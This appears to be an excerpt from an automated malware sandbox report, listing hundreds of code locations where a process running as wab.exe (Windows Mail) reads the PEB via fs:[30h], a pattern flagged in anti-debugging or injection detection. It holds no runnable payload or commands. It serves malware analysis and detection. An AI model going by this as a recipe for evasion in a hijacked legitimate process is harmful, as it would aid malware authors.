Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E9303 mov eax, dword ptr fs:[00000030h] 12_2_232E9303
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E9303 mov eax, dword ptr fs:[00000030h] 12_2_232E9303
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332631F mov eax, dword ptr fs:[00000030h] 12_2_2332631F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF30A mov eax, dword ptr fs:[00000030h] 12_2_233AF30A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h] 12_2_2336E372
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370371 mov eax, dword ptr fs:[00000030h] 12_2_23370371
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370371 mov eax, dword ptr fs:[00000030h] 12_2_23370371
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331237A mov eax, dword ptr fs:[00000030h] 12_2_2331237A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h] 12_2_232FB360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h] 12_2_2332E363
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h] 12_2_232E8347
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h] 12_2_232E8347
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h] 12_2_232E8347
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336C3B0 mov eax, dword ptr fs:[00000030h] 12_2_2336C3B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F93A6 mov eax, dword ptr fs:[00000030h] 12_2_232F93A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F93A6 mov eax, dword ptr fs:[00000030h] 12_2_232F93A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h] 12_2_2331A390
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h] 12_2_2331A390
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h] 12_2_2331A390
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h] 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h] 12_2_2330F380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF38A mov eax, dword ptr fs:[00000030h] 12_2_233AF38A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233233D0 mov eax, dword ptr fs:[00000030h] 12_2_233233D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233743D5 mov eax, dword ptr fs:[00000030h] 12_2_233743D5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233243D0 mov ecx, dword ptr fs:[00000030h] 12_2_233243D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F63CB mov eax, dword ptr fs:[00000030h] 12_2_232F63CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC3C7 mov eax, dword ptr fs:[00000030h] 12_2_232EC3C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h] 12_2_232EE3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h] 12_2_232EE3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h] 12_2_232EE3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23310230 mov ecx, dword ptr fs:[00000030h] 12_2_23310230
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370227 mov eax, dword ptr fs:[00000030h] 12_2_23370227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370227 mov eax, dword ptr fs:[00000030h] 12_2_23370227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23370227 mov eax, dword ptr fs:[00000030h] 12_2_23370227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h] 12_2_2332A22B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h] 12_2_2332A22B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h] 12_2_2332A22B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337B214 mov eax, dword ptr fs:[00000030h] 12_2_2337B214
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337B214 mov eax, dword ptr fs:[00000030h] 12_2_2337B214
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA200 mov eax, dword ptr fs:[00000030h] 12_2_232EA200
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E821B mov eax, dword ptr fs:[00000030h] 12_2_232E821B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338327E mov eax, dword ptr fs:[00000030h] 12_2_2338327E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AD270 mov eax, dword ptr fs:[00000030h] 12_2_233AD270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h] 12_2_232EB273
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h] 12_2_232EB273
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB273 mov eax, dword ptr fs:[00000030h] 12_2_232EB273
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331F24A mov eax, dword ptr fs:[00000030h] 12_2_2331F24A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF247 mov eax, dword ptr fs:[00000030h] 12_2_233AF247
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB2BC mov eax, dword ptr fs:[00000030h] 12_2_233CB2BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E92AF mov eax, dword ptr fs:[00000030h] 12_2_232E92AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B92AB mov eax, dword ptr fs:[00000030h] 12_2_233B92AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF2AE mov eax, dword ptr fs:[00000030h] 12_2_233AF2AE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233142AF mov eax, dword ptr fs:[00000030h] 12_2_233142AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233142AF mov eax, dword ptr fs:[00000030h] 12_2_233142AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC2B0 mov ecx, dword ptr fs:[00000030h] 12_2_232EC2B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E289 mov eax, dword ptr fs:[00000030h] 12_2_2336E289
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h] 12_2_232F7290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h] 12_2_232F7290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7290 mov eax, dword ptr fs:[00000030h] 12_2_232F7290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED2EC mov eax, dword ptr fs:[00000030h] 12_2_232ED2EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED2EC mov eax, dword ptr fs:[00000030h] 12_2_232ED2EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233002F9 mov eax, dword ptr fs:[00000030h] 12_2_233002F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E72E0 mov eax, dword ptr fs:[00000030h] 12_2_232E72E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA2E0 mov eax, dword ptr fs:[00000030h] 12_2_232FA2E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F82E0 mov eax, dword ptr fs:[00000030h] 12_2_232F82E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233132C5 mov eax, dword ptr fs:[00000030h] 12_2_233132C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C32C9 mov eax, dword ptr fs:[00000030h] 12_2_233C32C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF13E mov eax, dword ptr fs:[00000030h] 12_2_233AF13E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23327128 mov eax, dword ptr fs:[00000030h] 12_2_23327128
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23327128 mov eax, dword ptr fs:[00000030h] 12_2_23327128
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F510D mov eax, dword ptr fs:[00000030h] 12_2_232F510D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320118 mov eax, dword ptr fs:[00000030h] 12_2_23320118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 mov eax, dword ptr fs:[00000030h] 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331510F mov eax, dword ptr fs:[00000030h] 12_2_2331510F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2334717A mov eax, dword ptr fs:[00000030h] 12_2_2334717A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2334717A mov eax, dword ptr fs:[00000030h] 12_2_2334717A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F6179 mov eax, dword ptr fs:[00000030h] 12_2_232F6179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332716D mov eax, dword ptr fs:[00000030h] 12_2_2332716D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h] 12_2_232EA147
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h] 12_2_232EA147
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA147 mov eax, dword ptr fs:[00000030h] 12_2_232EA147
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h] 12_2_233C3157
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h] 12_2_233C3157
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3157 mov eax, dword ptr fs:[00000030h] 12_2_233C3157
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332415F mov eax, dword ptr fs:[00000030h] 12_2_2332415F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2338314A mov eax, dword ptr fs:[00000030h] 12_2_2338314A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C5149 mov eax, dword ptr fs:[00000030h] 12_2_233C5149
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233241BB mov ecx, dword ptr fs:[00000030h] 12_2_233241BB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233241BB mov eax, dword ptr fs:[00000030h] 12_2_233241BB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233241BB mov eax, dword ptr fs:[00000030h] 12_2_233241BB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C51B6 mov eax, dword ptr fs:[00000030h] 12_2_233C51B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233231BE mov eax, dword ptr fs:[00000030h] 12_2_233231BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233231BE mov eax, dword ptr fs:[00000030h] 12_2_233231BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E1A4 mov eax, dword ptr fs:[00000030h] 12_2_2332E1A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332E1A4 mov eax, dword ptr fs:[00000030h] 12_2_2332E1A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331190 mov eax, dword ptr fs:[00000030h] 12_2_23331190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331190 mov eax, dword ptr fs:[00000030h] 12_2_23331190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23319194 mov eax, dword ptr fs:[00000030h] 12_2_23319194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h] 12_2_232F4180
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h] 12_2_232F4180
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4180 mov eax, dword ptr fs:[00000030h] 12_2_232F4180
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h] 12_2_233001F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h] 12_2_233001F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001F1 mov eax, dword ptr fs:[00000030h] 12_2_233001F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331F1F0 mov eax, dword ptr fs:[00000030h] 12_2_2331F1F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331F1F0 mov eax, dword ptr fs:[00000030h] 12_2_2331F1F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E81EB mov eax, dword ptr fs:[00000030h] 12_2_232E81EB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F91E5 mov eax, dword ptr fs:[00000030h] 12_2_232F91E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F91E5 mov eax, dword ptr fs:[00000030h] 12_2_232F91E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FA1E3 mov eax, dword ptr fs:[00000030h] 12_2_232FA1E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 mov eax, dword ptr fs:[00000030h] 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B81EE mov eax, dword ptr fs:[00000030h] 12_2_233B81EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B81EE mov eax, dword ptr fs:[00000030h] 12_2_233B81EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E91F0 mov eax, dword ptr fs:[00000030h] 12_2_232E91F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E91F0 mov eax, dword ptr fs:[00000030h] 12_2_232E91F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233001C0 mov eax, dword ptr fs:[00000030h] 12_2_233001C0
